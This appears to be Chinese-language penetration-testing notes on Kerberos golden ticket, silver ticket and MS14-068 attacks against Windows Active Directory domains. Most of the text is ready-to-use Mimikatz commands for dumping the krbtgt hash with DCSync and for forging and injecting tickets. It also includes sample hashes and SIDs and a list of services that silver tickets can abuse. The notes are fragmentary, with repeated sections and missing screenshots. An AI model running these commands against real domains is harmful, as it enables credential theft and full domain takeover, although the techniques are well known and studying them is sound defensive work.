黃金票據 白銀票據 ms14068

黃金票據

黃金票據的條件要求：
1.域名稱[AD PowerShell模塊：（Get-ADDomain）.DNSRoot] 
2.域的SID 值[AD PowerShell模塊：（Get-ADDomain）.DomainSID.Value] 
3.域的KRBTGT賬戶NTLM密碼哈希
4.偽造用戶名

一旦攻擊者擁有管理員訪問域控制器的權限，就可以使用Mimikatz來提取KRBTGT帳戶密碼哈希值。

 

1.導出krbtgt的Hash

在域控上執行通過mimkatz輸出：

mimikatz log "lsadump::dcsync /domain:test.local /user:krbtgt"

 

 

生成票據 這里可以用aes256 aes128等等

kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi

 

 

導入票據

 kerberos::ptt ppc.kiribi

 

 

klist
klist  purge  刪除所有票據

 

 mimikatz # kerberos::purge //清空當前憑證 mimikatz # kerberos::list //查看當前機器憑證 mimikatz # kerberos::ptc 票據文件 //將上一步生成的票據注入到內存中

 

 第二種黃金票據

Hash NTLM: b93dba67240e8236cf1ab028034779e2 
aes256_hmac:5c54f6b6d3d4ac4958cf5e04969e60700b69d2285c65ee4e2810e808f4febacc
krbtgt


net group "domain admins" /domain


查看域的SID號
whoami /all
kerberos::purge #清空票據 kerberos::golden /admin:administrator /domain:pp.zhong.czf /sid:S-1-5-21-2461438818-3229013638-4126918765 /krbtgt:b93dba67240e8236cf1ab028034779e2 /ticket:ticket.kirbi kerberos::ptt ticket.kirbi kerberos::tgt（此條命令好像並沒有用）

 白銀票據

kerberos::golden /admin:zhangsanfeng /domain:qianxiao996.com /id:1108 /sid:S-1-5-21-2461438818-3229013638-4126918765-1108 /target:QIANXIAO996-DM.school.com /rc4:b1e99870ac1230e33233fb54f240f171 /service:LDAP /ptt

 

lsadump::dcsync /dc:QIANXIAO996-DM.qianxiao996.com /domain:qianxiao996.com /user:krbtgt

 總結

 白銀票據不與KDC交互，偽造Ticket直接與server進行交互。我們來看一下windows認證的第六步，server接收到客戶端的數據包后，使用自己的密碼hash解密ticket得出session key，在使用session key解密Authenticator和timestamp即通過驗證，所以我們只需要知道server用戶的hash就可以偽造出一個ticket，這就是白銀票據。
首先，我們訪問一個目標機器的C$文件夾

我們來偽造白銀票據，獲取目標server用戶名

獲取NTLM Hash

創建票據命令為：

kerberos::golden /domain:<域名> /sid:<域 SID> /target:<目標服務器主機名> /service:<服務類型> /rc4:<NTLM Hash> /user:<用戶名> /ptt

白銀票據根據用戶hash生成，而且只能根據某些服務創建，可利用的服務如下
服務注釋	服務名
WMI	HOST、RPCSS
Powershell Remoteing	HOST、HTTP
WinRM	HOST、HTTP
Scheduled Tasks	HOST
LDAP 、DCSync	LDAP
Windows File Share (CIFS)	CIFS
Windows Remote ServerAdministration Tools	RPCSS、LDAP、CIFS

生成票據

這時候再訪問c$，不需要輸入密碼

0x04 黃金票據分析及利用

第二步中我們收到了AS發送的TGT，由於TGT是使用krbtgt密碼hash加密，客戶端無法解密，但是如果我們知道了krbtgt的hash，那么就可以直接生成任意用戶的TGT，跳過了第一步的認證並可以訪問相應的資源，這就是偽造黃金票據。

域控導出krbtgt NTLM Hash

生成黃金票據

kerberos::golden /user:Administrator /domain:domain-name /sid:user-sid/krbtgt:ntlmhash-value /ticket:golden.ti

在目錄下生成了golden.ti票據文件，使用票據

kerberos::ptt golden.ti

這時候生成了一個域管理用戶票據，嘗試訪問其他用戶資源，成功，無需驗證

 MS14068

    -u 域賬號+@+域名稱，這里是ts1+@+yunying.lab
    -p 為當前用戶的密碼，即ts1的密碼
    -s 為ts1的SID值，可以通過whoami /all來獲參考戶的SID值
    -d 為當前域的域控

 

 

清除緩存導入票據

 

 

 

 最后

清除票據后

 

 

 

 

 

 

 

https://www.cnblogs.com/backlion/p/8127868.html
https://blog.csdn.net/qq_36374896/article/details/84453994
https://payloads.online/archivers/2018-11-30/1

https://blog.csdn.net/wy_97/article/details/87649262

https://www.varonis.com/blog/kerberos-attack-silver-ticket/

https://adsecurity.org/?p=2011

https://blog.csdn.net/wy_97/article/details/87649262

https://www.varonis.com/blog/kerberos-attack-silver-ticket/

https://adsecurity.org/?p=2011
https://www.dazhuanlan.com/2019/08/26/5d6304010760d/

 

特別注意的是sid不是本地管理員的sid是域用戶的sid 千萬別弄錯了 先net user查看域用戶的sid 或者切到域用戶登陸 whoami /all查看 方可 其他沒什么

 

 參考文獻

https://www.cnblogs.com/backlion/p/8127868.html
https://blog.csdn.net/qq_36374896/article/details/84453994
https://payloads.online/archivers/2018-11-30/1

https://blog.csdn.net/wy_97/article/details/87649262

https://www.varonis.com/blog/kerberos-attack-silver-ticket/

https://adsecurity.org/?p=2011

https://blog.csdn.net/wy_97/article/details/87649262

https://www.varonis.com/blog/kerberos-attack-silver-ticket/

https://adsecurity.org/?p=2011
https://www.dazhuanlan.com/2019/08/26/5d6304010760d/

 

 

 

1.導出krbtgt的Hash

在域控上執行通過mimkatz輸出：

mimikatz log "lsadump::dcsync /domain:test.local /user:krbtgt"